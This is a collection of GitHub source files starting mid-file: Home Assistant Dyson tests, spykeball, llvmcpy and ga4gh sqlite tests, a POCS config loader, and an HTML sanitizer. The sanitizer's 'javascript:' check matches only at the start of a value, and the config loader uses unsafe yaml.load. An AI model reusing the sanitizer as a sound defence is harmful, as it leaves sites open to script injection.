            "pm25": "0035",
            "sltm": "OFF",
            "tact": "2960",
        },
    }
    device.environmental_state = DysonEnvironmentalSensorV2State(json.dumps(event))
    # Find the listener belonging to the air sensor entity and fire it.
    for call in device.add_message_listener.call_args_list:
        callback = call[0][0]
        # Fix: use isinstance instead of comparing types with ``type(...) ==``
        # (idiomatic and subclass-safe; behavior here is identical).
        if isinstance(callback.__self__, dyson.DysonAirSensor):
            callback(device.environmental_state)
    await hass.async_block_till_done()
    fan_state = hass.states.get("air_quality.living_room")
    attributes = fan_state.attributes
    assert fan_state.state == "35"
    assert attributes[ATTR_PM_2_5] == 35
    assert attributes[ATTR_PM_10] == 80
    assert attributes[ATTR_NO2] == 69
    assert attributes[dyson.ATTR_VOC] == 55
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
    "libpurecool.dyson.DysonAccount.devices",
    return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_component_setup_only_once(devices, login, hass):
    """Test if entities are created only once."""
    config = _get_config()
    await async_setup_component(hass, dyson_parent.DOMAIN, config)
    await hass.async_block_till_done()
    # Re-firing discovery for the same platform must not add a second entity.
    discovery.load_platform(hass, AIQ_DOMAIN, dyson_parent.DOMAIN, {}, config)
    await hass.async_block_till_done()
    assert len(hass.data[dyson.DYSON_AIQ_DEVICES]) == 1
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
    "libpurecool.dyson.DysonAccount.devices",
    return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_without_discovery(devices, login, hass):
    """Test if component correctly returns if discovery not set."""
    await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
    await hass.async_block_till_done()
    add_entities_mock = mock.MagicMock()
    # Calling platform setup with discovery_info=None must be a no-op.
    dyson.setup_platform(hass, None, add_entities_mock, None)
    assert add_entities_mock.call_count == 0
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
    "libpurecool.dyson.DysonAccount.devices",
    return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_empty_environment_state(devices, login, hass):
    """Test device with empty environmental state."""
    await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
    await hass.async_block_till_done()
    device = hass.data[dyson.DYSON_AIQ_DEVICES][0]
    # With no environmental readings every sensor property degrades to None.
    device._device.environmental_state = None
    assert device.state is None
    assert device.particulate_matter_2_5 is None
    assert device.particulate_matter_10 is None
    assert device.nitrogen_dioxide is None
    assert device.volatile_organic_compounds is None
|
{
"content_hash": "1b8a02df7ab1da8653c6c004d23cd243",
"timestamp": "",
"source": "github",
"line_count": 159,
"max_line_length": 83,
"avg_line_length": 35.716981132075475,
"alnum_prop": 0.6849797499559782,
"repo_name": "Teagan42/home-assistant",
"id": "ed2fbed34f3d8fc3fe1df1b34b271fa6ef462719",
"size": "5679",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/dyson/test_air_quality.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19774313"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
}
|
"""Game Tests."""
import pytest
from spykeball import game
from spykeball import util
@pytest.fixture(scope='session')
def sample_games(sample_players):
    """Create Sample Games from sample_players.

    Returns a dict with 'games' (one Game per group of four players) and
    'length' (player count divided by four).
    """
    # NOTE(review): under Python 3 this is true division and yields a float;
    # if 'length' is meant to count games, ``// 4`` looks intended — confirm.
    length = sample_players['length'] / 4
    players = sample_players['players']
    games = []
    # Each consecutive group of four players forms one game.
    for p1, p2, p3, p4 in util.groupby(players, 4):
        games.append(game.Game(p1, p2, p3, p4))
    return {'games': games, 'length': length}
def test_game_iteration(sample_games):
    """Test the iteration protocol on the game class.

    Each Game should yield the same events as its internal action list.
    """
    # Fix: the fixture returns {'games': [...], 'length': ...}; iterating the
    # dict itself walked its string keys, so ``gameobj._actionlist`` would
    # raise AttributeError instead of testing anything.
    for gameobj in sample_games['games']:
        for event, true_event in zip(gameobj, gameobj._actionlist):
            assert event == true_event
def test_game_containment(sample_games):
    """Test the containment of players or actions in game objects."""
    # TODO: placeholder — containment checks are not implemented yet.
    assert True
|
{
"content_hash": "91771d835ae7d2b556214b8e6073cd85",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 69,
"avg_line_length": 28.20689655172414,
"alnum_prop": 0.6699266503667481,
"repo_name": "bhgomes/spykeball",
"id": "fc19dbea4891f452b8a47f3a78ca4db1f5d05952",
"size": "818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/game_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53382"
},
{
"name": "Shell",
"bytes": "521"
}
],
"symlink_target": ""
}
|
import unittest
from llvmcpy import llvm
from packaging import version
# LLVM IR shared by all tests: three functions (function2, function1, main)
# so that function counting and basic-block traversal have real targets.
module_source = """; ModuleID = 'example.c'
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: nounwind uwtable
define i32 @function2() {
  ret i32 42
}
; Function Attrs: nounwind uwtable
define i32 @function1() {
  %1 = call i32 @function2()
  %2 = call i32 @function2()
  ret i32 %1
}
; Function Attrs: nounwind uwtable
define i32 @main(i32, i8**) {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %6 = call i32 @function1()
  ret i32 %6
}
"""
# Module-level metadata flags are only appended for LLVM >= 7 so the IR
# still parses against older LLVM versions (used by test_metadata_flags).
if version.parse(llvm.version) >= version.parse("7.0"):
    module_source = module_source + """
!llvm.module.flags = !{!0}
!0 = !{ i32 4, !"foo", i32 42 }
"""
def load_module(ir):
    """Parse the textual IR string *ir* into a module in the global context."""
    context = llvm.get_global_context()
    # Copy the IR into an LLVM memory buffer named "example" and parse it.
    membuf = llvm.create_memory_buffer_with_memory_range_copy(
        ir, len(ir), "example")
    return context.parse_ir(membuf)
def get_function_number(ir):
    """Return how many functions the parsed module *ir* defines."""
    return sum(1 for _ in load_module(ir).iter_functions())
def get_non_existing_basic_block(ir):
    """Deliberately walk past the last basic block of the first function.

    The first function in ``module_source`` has a single basic block, so
    ``get_next()`` yields a null value and the chained access is expected
    to raise ``AttributeError`` (asserted by ``test_null_ptr``).
    """
    module = load_module(ir)
    first_function = list(module.iter_functions())[0]
    first_basic_block = list(first_function.iter_basic_blocks())[0]
    first_basic_block.get_next().first_instruction()
class TestSuite(unittest.TestCase):
    """Smoke tests for the llvmcpy binding using the shared IR module."""
    def test_function_count(self):
        """The example module defines exactly three functions."""
        self.assertEqual(get_function_number(module_source), 3)
    def test_null_ptr(self):
        """Dereferencing a null basic block raises AttributeError."""
        with self.assertRaises(AttributeError):
            get_non_existing_basic_block(module_source)
    def test_resolve_enums(self):
        """Enum lookup works in both directions (value->name, name->value)."""
        assert llvm.Opcode[llvm.Switch] == 'Switch'
        assert llvm.Opcode['Switch'] == llvm.Switch
    def test_translate_null_ptr_to_none(self):
        """Null-returning API calls are translated to Python None."""
        module = load_module(module_source)
        first_function = list(module.iter_functions())[0]
        first_basic_block = list(first_function.iter_basic_blocks())[0]
        first_instruction = first_basic_block.first_instruction
        # A `ret` is not a binary operator, so the query returns None.
        assert first_instruction.is_a_binary_operator() is None
    def test_value_as_key(self):
        """Equal LLVM values hash identically and can serve as dict keys."""
        module = load_module(module_source)
        function1 = module.get_named_function("function1")
        first_basic_block = function1.get_first_basic_block()
        first_instruction = first_basic_block.get_first_instruction()
        second_instruction = first_instruction.get_next_instruction()
        # Both calls target @function2, so their operands are the same value.
        operand1 = first_instruction.get_operand(0)
        operand2 = second_instruction.get_operand(0)
        dictionary = {}
        dictionary[operand1] = 42
        assert operand2 in dictionary
    def test_sized_string_return(self):
        """Embedded NULs survive the sized-string round trip."""
        string = "a\0b\0c"
        value = llvm.md_string(string, len(string))
        self.assertEqual(value.get_md_string(), string)
        self.assertEqual(value.get_md_string(encoding=None), string.encode('ascii'))
    def test_metadata_flags(self):
        """Module flag metadata (LLVM >= 7 only) is readable via the API."""
        if version.parse(llvm.version) < version.parse("7.0"):
            return
        module = load_module(module_source)
        length = llvm.ffi.new("size_t *")
        metadata_flags = module.copy_module_flags_metadata(length)
        behavior = metadata_flags.module_flag_entries_get_flag_behavior(0)
        key = metadata_flags.module_flag_entries_get_key(0)
        # The IR declares !{ i32 4, !"foo", i32 42 }: behavior 4 is encoded
        # as enum value 3; the key is "foo".
        assert behavior == 3
        assert key == "foo"
# Allow running this test module directly: ``python test.py``.
if __name__ == '__main__':
    unittest.main()
|
{
"content_hash": "a61c1d4fdfbbcaa6f6298f962fdb9963",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 84,
"avg_line_length": 33.850467289719624,
"alnum_prop": 0.6300386526780785,
"repo_name": "revng/llvmcpy",
"id": "56ff6d2788f4811926fb205e3a7878ae240f43e2",
"size": "3622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "llvmcpy/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "36097"
}
],
"symlink_target": ""
}
|
"""
Unit tests for the sql backend
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import ga4gh.sqliteBackend as sqliteBackend
import tests.paths as paths
class SqliteDB(sqliteBackend.SqliteBackedDataSource):
    """Minimal data source used to exercise the sqlite backend helpers."""
    def __init__(self, dbPath=paths.testDataRepo):
        super(SqliteDB, self).__init__(dbPath)
        # Query shared by the fetch helpers below.
        self._readGroupSql = "SELECT id, name FROM ReadGroup"
    def ping(self):
        """Return 1 if the database connection answers a trivial query."""
        sql = "SELECT 1"
        query = self._dbconn.execute(sql)
        row = query.fetchone()
        # The single result column is literally named "1", so int() of the
        # first column NAME yields 1.
        result = int(row.keys()[0])
        return result
    def fetchOneMethod(self):
        """Fetch a single ReadGroup row as a dict via fetchOne()."""
        sql = "SELECT id, name FROM ReadGroup LIMIT 1"
        query = self._dbconn.execute(sql)
        rowDict = sqliteBackend.fetchOne(query)
        return rowDict
    def getReadGroupRows(self):
        """Return all ReadGroup rows as raw sqlite row objects."""
        sql = self._readGroupSql
        query = self._dbconn.execute(sql)
        rows = query.fetchall()
        return rows
    def iterativeFetchMethod(self):
        """Return an iterator over ReadGroup rows, fetched two at a time."""
        sql = self._readGroupSql
        query = self._dbconn.execute(sql)
        iterator = sqliteBackend.iterativeFetch(query, 2)
        return iterator
class TestSqlBackend(unittest.TestCase):
    """Unit tests for the sqlite backend helpers (Python 2: uses ``unicode``)."""
    def setUp(self):
        self._db = SqliteDB()
    def testPing(self):
        """The connection answers SELECT 1."""
        result = None
        with self._db as db:
            result = db.ping()
        self.assertEqual(result, 1)
    def testLimitClause(self):
        """limitsSql renders LIMIT clauses and rejects a bare startIndex."""
        noArgs = sqliteBackend.limitsSql()
        zeroArgs = sqliteBackend.limitsSql(0, 0)
        self.assertEqual(noArgs, zeroArgs)
        # startIndex without maxResults is meaningless in SQL LIMIT syntax.
        with self.assertRaises(Exception):
            sqliteBackend.limitsSql(startIndex=5)
        limit = sqliteBackend.limitsSql(startIndex=1, maxResults=2)
        self.assertEqual(limit, " LIMIT 1, 2")
        limit = sqliteBackend.limitsSql(maxResults=3)
        self.assertEqual(limit, " LIMIT 3")
    def _testRowDict(self, rowDict):
        """Assert a row dict has exactly unicode 'id' and 'name' entries."""
        self.assertEqual(len(rowDict.keys()), 2)
        self.assertIn("id", rowDict.keys())
        self.assertIn("name", rowDict.keys())
        self.assertIsInstance(rowDict["id"], unicode)
        self.assertIsInstance(rowDict["name"], unicode)
    def testRowToDict(self):
        """A single sqlite row converts to the expected dict shape."""
        rows = None
        with self._db as db:
            rows = db.getReadGroupRows()
            row = rows[0]
            rowDict = sqliteBackend.sqliteRowToDict(row)
            self._testRowDict(rowDict)
    def testRowsToDicts(self):
        """Bulk conversion yields one well-formed dict per row."""
        rows = None
        with self._db as db:
            rows = db.getReadGroupRows()
            rowDicts = sqliteBackend.sqliteRowsToDicts(rows)
            for rowDict in rowDicts:
                self._testRowDict(rowDict)
    def testIterativeFetch(self):
        """Chunked iteration yields the same rows as a plain fetchall."""
        iterator = None
        with self._db as db:
            iterator = db.iterativeFetchMethod()
            for rowDict in iterator:
                self._testRowDict(rowDict)
            iteratorLen = len(list(db.iterativeFetchMethod()))
            regularLen = len(db.getReadGroupRows())
            self.assertEqual(iteratorLen, regularLen)
    def testFetchOne(self):
        """fetchOne returns a single well-formed row dict."""
        rowDict = None
        with self._db as db:
            rowDict = db.fetchOneMethod()
        self._testRowDict(rowDict)
|
{
"content_hash": "051a4f0a294ee79a0d544fd16acd7be8",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 67,
"avg_line_length": 29.74074074074074,
"alnum_prop": 0.6229763387297634,
"repo_name": "ohsu-computational-biology/server",
"id": "d0dbd558ff82e5a67c2a72b6fe231058021892f1",
"size": "3212",
"binary": false,
"copies": "1",
"ref": "refs/heads/g2p-2.5",
"path": "tests/unit/test_sql_backend.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "7380"
},
{
"name": "Jupyter Notebook",
"bytes": "41926"
},
{
"name": "Python",
"bytes": "1238265"
},
{
"name": "Shell",
"bytes": "973"
}
],
"symlink_target": ""
}
|
import os
import yaml
from astropy import units as u
from pocs import hardware
from pocs.utils import listify
from warnings import warn
def load_config(config_files=None, simulator=None, parse=True, ignore_local=False):
    """Load and merge YAML configuration files.

    Args:
        config_files: Names or paths of YAML files; defaults to ``['pocs']``.
            Bare names get a ``.yaml`` suffix and are resolved inside
            ``$POCS/conf_files``; absolute paths are used as-is.
        simulator: Optional spec passed to ``hardware.get_simulator_names``;
            the result is stored under ``config['simulator']``.
        parse: When True (default) run the result through ``parse_config``.
        ignore_local: When True skip the per-file ``*_local.yaml`` overrides.

    Returns:
        dict: the merged configuration.
    """
    # Default to the pocs.yaml file
    if config_files is None:
        config_files = ['pocs']
    config_files = listify(config_files)
    config = dict()
    config_dir = '{}/conf_files'.format(os.getenv('POCS'))
    for f in config_files:
        if not f.endswith('.yaml'):
            f = '{}.yaml'.format(f)
        if not f.startswith('/'):
            path = os.path.join(config_dir, f)
        else:
            path = f
        try:
            _add_to_conf(config, path)
        except Exception as e:
            warn("Problem with config file {}, skipping. {}".format(path, e))
        # Load local version of config
        # Each file's "<name>_local.yaml" override is merged right after it,
        # so local values win over the shipped defaults.
        # NOTE(review): str.replace swaps EVERY '.', so a filename containing
        # extra dots would be mangled — confirm config names are simple.
        if not ignore_local:
            local_version = os.path.join(config_dir, f.replace('.', '_local.'))
            if os.path.exists(local_version):
                try:
                    _add_to_conf(config, local_version)
                except Exception:
                    warn("Problem with local config file {}, skipping".format(local_version))
    if simulator is not None:
        config['simulator'] = hardware.get_simulator_names(simulator=simulator)
    if parse:
        config = parse_config(config)
    return config
def parse_config(config):
    """Post-process a raw config dict in place and return it.

    Angular location entries get astropy degree units (elevation gets
    meters, defaulting to 0), and relative directory entries are prefixed
    with ``$PANDIR``.
    """
    if 'location' in config:
        site = config['location']
        for key in ('latitude', 'longitude', 'horizon', 'twilight_horizon'):
            if key in site:
                site[key] = site[key] * u.degree
        site['elevation'] = site.get('elevation', 0) * u.meter
    if 'directories' in config:
        base_dir = os.getenv('PANDIR')
        for name, rel_path in config['directories'].items():
            if not rel_path.startswith('/'):
                config['directories'][name] = '{}/{}'.format(base_dir, rel_path)
    return config
def save_config(path, config, clobber=True):
    """Serialize *config* as YAML to *path*.

    A missing ``.yaml`` suffix is appended; relative paths are placed in
    ``$POCS/conf_files``.  When *clobber* is False an existing file is left
    untouched and a warning is emitted instead.
    """
    if not path.endswith('.yaml'):
        path = '{}.yaml'.format(path)
    if not path.startswith('/'):
        path = os.path.join('{}/conf_files'.format(os.getenv('POCS')), path)
    if os.path.exists(path) and not clobber:
        warn("Path exists and clobber=False: {}".format(path))
    else:
        with open(path, 'w') as config_file:
            config_file.write(yaml.dump(config))
def _add_to_conf(config, fn):
    """Merge the YAML mapping stored in file *fn* into *config* in place.

    Missing files are silently ignored; non-mapping or empty documents are
    skipped rather than merged.
    """
    try:
        with open(fn, 'r') as f:
            # NOTE(review): yaml.load without an explicit Loader can construct
            # arbitrary Python objects. Fine for trusted local config files,
            # but prefer yaml.safe_load — confirm no configs rely on tags.
            c = yaml.load(f.read())
            if c is not None and isinstance(c, dict):
                config.update(c)
    except IOError:  # pragma: no cover
        pass
|
{
"content_hash": "924abf596b4a3a647e8914951d61c114",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 93,
"avg_line_length": 29.175257731958762,
"alnum_prop": 0.5752650176678445,
"repo_name": "AstroHuntsman/POCS",
"id": "9250eafc8a08f790507a2515a4d3911856553738",
"size": "2830",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "pocs/utils/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "22750"
},
{
"name": "C++",
"bytes": "55452"
},
{
"name": "JavaScript",
"bytes": "13166"
},
{
"name": "Processing",
"bytes": "9037"
},
{
"name": "Python",
"bytes": "657327"
},
{
"name": "Shell",
"bytes": "13542"
}
],
"symlink_target": ""
}
|
import logging
import string
import re
from external.BeautifulSoup import BeautifulSoup, Comment
# Whitelist of tags considered safe for untrusted HTML.
acceptable_tags = ['a', 'abbr', 'acronym', 'address', 'area', 'b', 'big',
    'blockquote', 'br', 'button', 'caption', 'center', 'cite', 'code',
    'col', 'colgroup', 'dd', 'del', 'dfn', 'dir', 'div', 'dl', 'dt', 'em',
    'fieldset', 'font', 'form', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr',
    'i', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'map',
    'menu', 'ol', 'optgroup', 'option', 'p', 'pre', 'q', 's', 'samp',
    'select', 'small', 'span', 'strike', 'strong', 'sub', 'sup', 'table',
    'tbody', 'td', 'textarea', 'tfoot', 'th', 'thead', 'tr', 'tt', 'u',
    'ul', 'var']
# Whitelist of attributes considered safe for untrusted HTML.
acceptable_attributes = ['abbr', 'accept', 'accept-charset', 'accesskey',
    'action', 'align', 'alt', 'axis', 'border', 'cellpadding',
    'cellspacing', 'char', 'charoff', 'charset', 'checked', 'cite', 'class',
    'clear', 'cols', 'colspan', 'color', 'compact', 'coords', 'datetime',
    'dir', 'disabled', 'enctype', 'for', 'frame', 'headers', 'height',
    'href', 'hreflang', 'hspace', 'id', 'ismap', 'label', 'lang',
    'longdesc', 'maxlength', 'media', 'method', 'multiple', 'name',
    'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', 'rel', 'rev',
    'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size',
    'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title',
    'type', 'usemap', 'valign', 'value', 'vspace', 'width']
# Extra tags/attributes only allowed when the HTML comes from a trusted
# source (style/embed can carry executable content).
tags_for_trusted_source = ['object', 'param', 'embed', 'style']
attributes_for_trusted_source = ['style', 'wmode']
# Elements whose mere presence aborts sanitization with an error.
danger_elements = ['script', 'applet']
# Attributes that can carry a javascript: URL.
js_possible_attributes = ['href', 'src']
# hrefs must be absolute http(s) URLs for untrusted input.
href_matcher = re.compile("^https?://", re.IGNORECASE)
javascript_matcher = re.compile("javascript:", re.IGNORECASE | re.MULTILINE)
class DangerousHTMLError(Exception):
    """Raised when submitted HTML contains overtly dangerous content.

    ``value`` holds the offending HTML pre-chopped into short fragments so
    it stays inert if it is ever echoed into a log viewer or page.
    """
    def __init__(self, value):
        self.value = chop_up(value) # Even when logging, could be displayed
    def __str__(self):
        return ' ~ '.join(self.value)
def sanitize_html(html='<p>No comment</p>', encoding=None,
                  allow_tags=[], allow_attributes=[],
                  blacklist_tags=[], blacklist_attributes=[],
                  trusted_source=False):
    """Parses HTML and tries to sanitize it using white list.

    This method is a mishmash of code from Django snippets
    (http://www.djangosnippets.org/snippets/169) and the
    HTML sanitization of Universal Feed Parser. It explicitly
    looks for valid hrefs to prevent scripts lurking in there.
    Unfortunately, style, either as a tag or attribute, can
    contain malicious script through executable CSS definitions.
    So sanitized HTML cannot be colored or highlighted using styles.
    Args:
        html: HTML to be sanitized.
        encoding: codec used to decode byte-string input (default latin-1).
        allow_tags: limit all tags to just this list
        allow_attributes: limit all attributes to just this list
        blacklist_tags: tags to remove from the allowed set
        blacklist_attributes: attributes to remove from the allowed set
        trusted_source: should only be TRUE if you trust the source;
            allows style/object/embed content and non-absolute hrefs.
    Returns:
        Sanitized version of html
    Raises:
        DangerousHTMLError if the supplied HTML has dangerous elements.
    """
    if not allow_tags:
        allow_tags = acceptable_tags
    if not allow_attributes:
        allow_attributes = acceptable_attributes
    allow_tags = [tag for tag in allow_tags if tag not in blacklist_tags]
    # Bug fix: attributes were filtered against blacklist_tags, so the
    # blacklist_attributes parameter was silently ignored.
    allow_attributes = [attr for attr in allow_attributes
                        if attr not in blacklist_attributes]
    if trusted_source:
        allow_attributes += attributes_for_trusted_source
        allow_tags += tags_for_trusted_source
    # Unicode input is parsed directly; byte strings are decoded first.
    if isinstance(html, unicode) and not encoding:
        logging.debug("Sanitizing unicode input.")
        soup = BeautifulSoup(html,
            convertEntities=BeautifulSoup.XHTML_ENTITIES)
    else:
        if not encoding:
            encoding = 'latin-1'
        logging.debug("Sanitizing string input, assuming %s", encoding)
        soup = BeautifulSoup(html.decode(encoding, 'ignore'),
            convertEntities=BeautifulSoup.XHTML_ENTITIES)
    # Drop HTML comments entirely; they can hide conditional markup.
    for comment in soup.findAll(
        text = lambda text: isinstance(text, Comment)):
        comment.extract()
    for tag in soup.findAll(True):
        if tag.name not in allow_tags:
            tag.hidden = True
        if tag.name in danger_elements:
            raise DangerousHTMLError(html)
        ok_attrs = []
        for attr, val in tag.attrs:
            # For untrusted input only absolute http(s) hrefs survive.
            if attr == 'href' and not href_matcher.match(val) and not trusted_source:
                continue
            if attr in allow_attributes:
                # href/src carrying a javascript: URL aborts sanitization.
                if attr in js_possible_attributes:
                    if javascript_matcher.match(val):
                        raise DangerousHTMLError(html)
                ok_attrs += [(attr, val)]
        tag.attrs = ok_attrs
    return soup.renderContents().decode('utf-8')
def chop_up(text, chop_size=5):
    """Return *text* split into consecutive chunks of at most *chop_size* chars.

    An empty string yields an empty list.  Uses floor division and
    ``range`` so the result is identical on Python 2 and also correct on
    Python 3 (the original ``/`` and ``xrange`` were Python-2-only).
    """
    chars = len(text)
    blocks = chars // chop_size
    if chars % chop_size:
        blocks += 1
    return [text[i * chop_size:min(chars, (i + 1) * chop_size)]
            for i in range(blocks)]
|
{
"content_hash": "ef5bf406a36b959c06a1f75b863380c8",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 85,
"avg_line_length": 43.067796610169495,
"alnum_prop": 0.6042896497441952,
"repo_name": "bcherry/adequatelygood",
"id": "daa981e2f7e118d4711cdee80ce9cd06f2fdd77c",
"size": "6201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/sanitizer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "52247"
},
{
"name": "HTML",
"bytes": "58467"
},
{
"name": "JavaScript",
"bytes": "94393"
},
{
"name": "Python",
"bytes": "305186"
},
{
"name": "Ruby",
"bytes": "149"
},
{
"name": "Shell",
"bytes": "96"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.